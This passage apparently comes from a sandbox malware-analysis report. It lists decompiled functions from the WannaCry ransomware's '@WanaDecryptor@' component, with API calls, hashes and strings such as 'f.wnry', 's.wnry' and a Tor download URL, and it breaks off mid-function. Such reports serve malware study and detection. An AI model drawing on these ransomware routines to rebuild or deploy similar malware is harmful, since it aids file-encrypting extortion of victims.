                                  • API ID: #567$#324
                                  • String ID: 0ZA$DZA
                                  • API String ID: 784016053-3838179817
                                  • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                  • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v24;
                                  				intOrPtr _t24;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413809);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t24;
                                  				_push(__ecx);
                                  				_push(_a4);
                                  				_push(0x89);
                                  				_v16 = __ecx;
                                  				L00412C92();
                                  				_v12 = 0;
                                  				L00412DA6();
                                  				 *((intOrPtr*)(__ecx + 0x68)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
                                  				_push(0x421798);
                                  				_v12 = 3;
                                  				 *((intOrPtr*)(__ecx)) = 0x415ec8;
                                  				L00412DA0();
                                  				 *[fs:0x0] = _v24;
                                  				return __ecx;
                                  			}








                                  APIs
                                  • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                  • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                  • #860.MFC42(00421798), ref: 00404CAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #324#540#860
                                  • String ID: 0ZA$DZA
                                  • API String ID: 1048258301-3838179817
                                  • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                  • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00408B40(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t23;
                                  				int _t25;
                                  				intOrPtr _t30;
                                  				int _t38;
                                  				int _t41;
                                  				intOrPtr* _t43;
                                  				int _t45;
                                  				intOrPtr _t47;
                                  				struct HDC__* _t50;
                                  				intOrPtr _t52;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041407B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t52;
                                  				_t47 = __ecx;
                                  				_v20 = __ecx;
                                  				 *((intOrPtr*)(__ecx)) = 0x4166e0;
                                  				_t23 =  *((intOrPtr*)(__ecx + 0x30));
                                  				_t50 = 0;
                                  				_v4 = 1;
                                  				if(_t23 == 0) {
                                  					 *((intOrPtr*)(__ecx + 8)) = 0;
                                  					 *(__ecx + 4) = 0;
                                  				} else {
                                  					_t41 =  *(__ecx + 0x24);
                                  					_t45 =  *(__ecx + 0x20);
                                  					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
                                  					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
                                  					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
                                  					if(__ecx != 0) {
                                  						_t50 =  *(__ecx + 4);
                                  					}
                                  					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
                                  					_t23 =  *((intOrPtr*)(_t47 + 0x18));
                                  					if(_t23 != 0) {
                                  						_t23 =  *((intOrPtr*)(_t23 + 4));
                                  						_push(_t23);
                                  						_push( *((intOrPtr*)(_t47 + 4)));
                                  						L00412E48();
                                  					} else {
                                  						_push(_t23);
                                  						_push( *((intOrPtr*)(_t47 + 4)));
                                  						L00412E48();
                                  					}
                                  				}
                                  				_t43 = _t47 + 0x10;
                                  				_v16 = _t43;
                                  				 *_t43 = 0x415c00;
                                  				_v4 = 2;
                                  				L00412D52();
                                  				 *_t43 = 0x415bec;
                                  				_v4 = 0xffffffff;
                                  				L00412E3C();
                                  				 *[fs:0x0] = _v12;
                                  				return _t23;
                                  			}


















                                  APIs
                                  • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                  • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785$#2414#640
                                  • String ID:
                                  • API String ID: 2719443296-0
                                  • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                  • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00404530(void* __ecx) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				struct HDC__* _v32;
                                  				void* _v36;
                                  				struct tagSIZE _v48;
                                  				void* _v56;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				int _t21;
                                  				void* _t22;
                                  				intOrPtr _t41;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004137C8);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t41;
                                  				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
                                  				if(_t21 == 0) {
                                  					_t21 =  *((intOrPtr*)(__ecx + 0x58));
                                  					if(_t21 != 0) {
                                  						_push(__ecx);
                                  						L00412DEE();
                                  						_t22 = __ecx + 0x48;
                                  						_push(_t22);
                                  						_v8 = 0;
                                  						L00412DCA();
                                  						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
                                  						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
                                  						_push(_t22);
                                  						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
                                  						L00412DCA();
                                  						 *((char*)(__ecx + 0x5a)) = 1;
                                  						_v32 = 0xffffffff;
                                  						L00412DE8();
                                  					}
                                  				}
                                  				 *[fs:0x0] = _v12;
                                  				return _t21;
                                  			}















                                  APIs
                                  • #289.MFC42 ref: 0040455F
                                  • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                  • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                  • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                  • #613.MFC42 ref: 004045BB
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#289#613ExtentPoint32Text
                                  • String ID:
                                  • API String ID: 888490064-0
                                  • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                  • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004031A0(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t15;
                                  				intOrPtr* _t24;
                                  				intOrPtr* _t25;
                                  				intOrPtr _t30;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004135FF);
                                  				_t15 =  *[fs:0x0];
                                  				_push(_t15);
                                  				 *[fs:0x0] = _t30;
                                  				_v20 = __ecx;
                                  				_v4 = 0;
                                  				_t24 = __ecx + 0xec;
                                  				_v16 = _t24;
                                  				 *_t24 = 0x415c00;
                                  				_v4 = 4;
                                  				L00412D52();
                                  				 *_t24 = 0x415bec;
                                  				_t25 = __ecx + 0xe0;
                                  				_v16 = _t25;
                                  				 *_t25 = 0x415c00;
                                  				_v4 = 5;
                                  				L00412D52();
                                  				 *_t25 = 0x415bec;
                                  				_v4 = 1;
                                  				L00412D4C();
                                  				_v4 = 0;
                                  				L00412D3A();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t15;
                                  			}












                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                  • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                  • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                  • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#616#641#693
                                  • String ID:
                                  • API String ID: 1164084425-0
                                  • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                  • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040BE90(char* _a4, char* _a8, char* _a12) {
                                  
                                  				strncpy("s.wnry", _a4, 0x63);
                                  				strncpy("https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip", _a8, 0x63);
                                  				strncpy(0x4221ac, _a12, 0x63);
                                  				return 0;
                                  			}

                                  APIs
                                  Strings
                                  • https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
                                  • s.wnry, xrefs: 0040BE97
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strncpy
                                  • String ID: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry
                                  • API String ID: 3301158039-3000313716
                                  • Opcode ID: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                  • Instruction ID: 9df85d4950b3c0e310111636eb28cd84c7ce5d082e56baf833a5c0d57e8a6ec4
                                  • Opcode Fuzzy Hash: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                  • Instruction Fuzzy Hash: 47D017B138C2007AE124BA96EE93E2A22959F88F05F50454AB744550C0E9E99BA0836A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E00403AF0(void* __edi, void* __ebp) {
                                  				int _v4;
                                  				intOrPtr _v12;
                                  				char _v1252;
                                  				void _v2251;
                                  				char _v2252;
                                  				int _v2256;
                                  				signed int _t43;
                                  				signed char _t44;
                                  				signed int _t52;
                                  				signed int _t58;
                                  				signed int _t75;
                                  				signed int _t78;
                                  				struct _IO_FILE* _t103;
                                  				intOrPtr _t111;
                                  				void* _t113;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041369B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t111;
                                  				_t103 = fopen("f.wnry", "rt");
                                  				_t113 = _t111 - 0x8c4 + 8;
                                  				if(_t103 != 0) {
                                  					E00401E90( &_v1252, __eflags);
                                  					_v4 = 0;
                                  					_t43 = E00402020( &_v1252, 0, E00403810, 0);
                                  					__eflags = _t43;
                                  					if(_t43 != 0) {
                                  						_t44 =  *(_t103 + 0xc);
                                  						_v2256 = 0;
                                  						__eflags = _t44 & 0x00000010;
                                  						if((_t44 & 0x00000010) == 0) {
                                  							while(1) {
                                  								_v2252 = 0;
                                  								memset( &_v2251, 0, 0xf9 << 2);
                                  								asm("stosw");
                                  								asm("stosb");
                                  								_t52 = fgets( &_v2252, 0x3e7, _t103);
                                  								_t113 = _t113 + 0x18;
                                  								__eflags = _t52;
                                  								if(_t52 == 0) {
                                  									break;
                                  								}
                                  								asm("repne scasb");
                                  								_t75 = 0xbadbac;
                                  								__eflags = 0xbadbac;
                                  								if(0xbadbac != 0) {
                                  									while(1) {
                                  										asm("repne scasb");
                                  										_t78 =  !(_t75 | 0xffffffff) - 1;
                                  										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                  										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                  											goto L10;
                                  										}
                                  										L9:
                                  										asm("repne scasb");
                                  										_t78 =  !(_t78 | 0xffffffff) - 1;
                                  										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
                                  										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
                                  											goto L10;
                                  										}
                                  										asm("repne scasb");
                                  										__eflags =  !(_t78 | 0xffffffff) != 1;
                                  										if( !(_t78 | 0xffffffff) != 1) {
                                  											_t58 = E00402650( &_v1252,  &_v2252);
                                  											__eflags = _t58;
                                  											if(_t58 != 0) {
                                  												_t29 =  &_v2256;
                                  												 *_t29 = _v2256 + 1;
                                  												__eflags =  *_t29;
                                  											}
                                  										}
                                  										goto L14;
                                  										L10:
                                  										asm("repne scasb");
                                  										_t75 =  !(_t78 | 0xffffffff) - 1;
                                  										 *((char*)(_t113 + _t75 + 0x13)) = 0;
                                  										asm("repne scasb");
                                  										_t78 =  !(_t75 | 0xffffffff) - 1;
                                  										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                  										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                  											goto L10;
                                  										}
                                  										goto L9;
                                  									}
                                  								}
                                  								L14:
                                  								__eflags =  *(_t103 + 0xc) & 0x00000010;
                                  								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
                                  									continue;
                                  								}
                                  								break;
                                  							}
                                  						}
                                  						fclose(_t103);
                                  						__eflags = _v2256;
                                  						_t36 = _v2256 > 0;
                                  						__eflags = _t36;
                                  						_v4 = 0xffffffff;
                                  						E00401F30( &_v1252);
                                  						 *[fs:0x0] = _v12;
                                  						return 0 | _t36;
                                  					} else {
                                  						_v4 = 0xffffffff;
                                  						E00401F30( &_v1252);
                                  						__eflags = 0;
                                  						 *[fs:0x0] = _v12;
                                  						return 0;
                                  					}
                                  				} else {
                                  					 *[fs:0x0] = _v12;
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: fopen
                                  • String ID: f.wnry
                                  • API String ID: 1432627528-2448388194
                                  • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                  • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                  • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
                                  				char _v520;
                                  				void _v816;
                                  				struct _SECURITY_ATTRIBUTES* _v820;
                                  				void* _t15;
                                  				struct _SECURITY_ATTRIBUTES* _t37;
                                  				CHAR* _t38;
                                  				void* _t39;
                                  				CHAR* _t40;
                                  				struct _SECURITY_ATTRIBUTES** _t42;
                                  				struct _SECURITY_ATTRIBUTES** _t44;
                                  
                                  				_t40 = _a4;
                                  				CreateDirectoryA(_t40, 0);
                                  				_t38 = _a8;
                                  				_t15 = E00412920(_t38, _a12);
                                  				_t28 = _t15;
                                  				_t42 =  &(( &_v820)[2]);
                                  				if(_t15 != 0) {
                                  					_v820 = 0;
                                  					memset( &_v816, 0, 0x4a << 2);
                                  					E00412940(_t28, 0xffffffff,  &_v820);
                                  					_t37 = _v820;
                                  					_t44 =  &(_t42[6]);
                                  					if(_t37 > 0) {
                                  						_t39 = 0;
                                  						if(_t37 > 0) {
                                  							do {
                                  								E00412940(_t28, _t39,  &_v820);
                                  								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
                                  								E004129E0(_t28, _t39,  &_v520);
                                  								_t44 =  &(_t44[0xa]);
                                  								_t39 = _t39 + 1;
                                  							} while (_t39 < _t37);
                                  						}
                                  						E00412A00(_t28);
                                  						return 1;
                                  					} else {
                                  						return 0;
                                  					}
                                  				} else {
                                  					DeleteFileA(_t38);
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,76C53310,00000000,0019FA30), ref: 0040B6B4
                                  • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDeleteDirectoryFile
                                  • String ID: %s\%s
                                  • API String ID: 3195586388-4073750446
                                  • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                  • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                  • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
                                  				char _v500;
                                  				intOrPtr _v508;
                                  				char _v520;
                                  				char _v521;
                                  				char _v528;
                                  				char _v529;
                                  				intOrPtr _v536;
                                  				signed int _t42;
                                  				short _t46;
                                  				signed int _t48;
                                  				int _t62;
                                  				intOrPtr* _t63;
                                  				intOrPtr _t67;
                                  				intOrPtr _t81;
                                  				void* _t82;
                                  				void* _t83;
                                  				void* _t89;
                                  				void* _t94;
                                  				intOrPtr* _t95;
                                  				void* _t97;
                                  				void* _t99;
                                  
                                  				_t89 = __edi;
                                  				_t63 = __ecx;
                                  				_push(0);
                                  				L0041303E();
                                  				srand(__eax);
                                  				_t99 =  &_v508 + 8;
                                  				_t42 = rand();
                                  				asm("cdq");
                                  				_t94 = 0;
                                  				_t81 = _t42 % 0xc8 + 0x1f;
                                  				_v508 = _t81;
                                  				if(_t81 > 0) {
                                  					do {
                                  						_t62 = rand();
                                  						_t81 = _v508;
                                  						 *(_t99 + _t94 + 0x14) = _t62;
                                  						_t94 = _t94 + 1;
                                  					} while (_t94 < _t81);
                                  				}
                                  				_t95 = _a16;
                                  				_t97 = _t99 + _t81 - 0xb;
                                  				if(_t95 != 0) {
                                  					_push(_t89);
                                  					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
                                  					_t99 = _t99 + 0xc;
                                  					asm("movsw");
                                  					asm("movsb");
                                  					_t81 = _v508;
                                  					_t95 = _a16;
                                  				}
                                  				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
                                  				_t82 = _t81 + 1;
                                  				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
                                  				_t83 = _t82 + 1;
                                  				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
                                  				_v508 = _t83 + 1;
                                  				_t46 = E00412B00(_t97, 0x1f);
                                  				_t67 = _v508;
                                  				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
                                  				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
                                  				if(_t48 < 0) {
                                  					L12:
                                  					return _t48 | 0xffffffff;
                                  				} else {
                                  					E0040D5A0(_t63, _t97);
                                  					_push( &_v528);
                                  					_push( &_v520);
                                  					_push( &_v521);
                                  					_v528 = 0x1f4;
                                  					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
                                  						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
                                  						goto L12;
                                  					} else {
                                  						if(_t95 == 0) {
                                  							L10:
                                  							return 0;
                                  						} else {
                                  							_push(1);
                                  							_push(_v536);
                                  							_push( &_v528);
                                  							_push(2);
                                  							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
                                  								goto L10;
                                  							} else {
                                  								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                  • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
                                  				long _t28;
                                  				signed int _t38;
                                  				void* _t44;
                                  				long* _t45;
                                  				long _t46;
                                  				char _t47;
                                  
                                  				_t47 = _a12;
                                  				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
                                  					_t45 = _a16;
                                  					_t44 = 0;
                                  					_t38 = 0;
                                  					 *_t45 = 0;
                                  					_a12 = 0;
                                  					if(_t47 == 1) {
                                  						_t44 = _a4;
                                  						_a12 = 0;
                                  						goto L10;
                                  					} else {
                                  						if(_t47 != 2) {
                                  							L11:
                                  							_push(0x20);
                                  							L00412CEC();
                                  							_t46 = _t28;
                                  							if(_t47 == 1 || _t47 == 2) {
                                  								 *_t46 = 1;
                                  								 *((char*)(_t46 + 0x10)) = _a12;
                                  								 *(_t46 + 1) = _t38;
                                  								 *(_t46 + 4) = _t44;
                                  								 *((char*)(_t46 + 8)) = 0;
                                  								 *(_t46 + 0xc) = 0;
                                  								if(_t38 != 0) {
                                  									 *(_t46 + 0xc) = SetFilePointer(_t44, 0, 0, 1);
                                  								}
                                  								 *_a16 = 0;
                                  								return _t46;
                                  							} else {
                                  								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
                                  								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
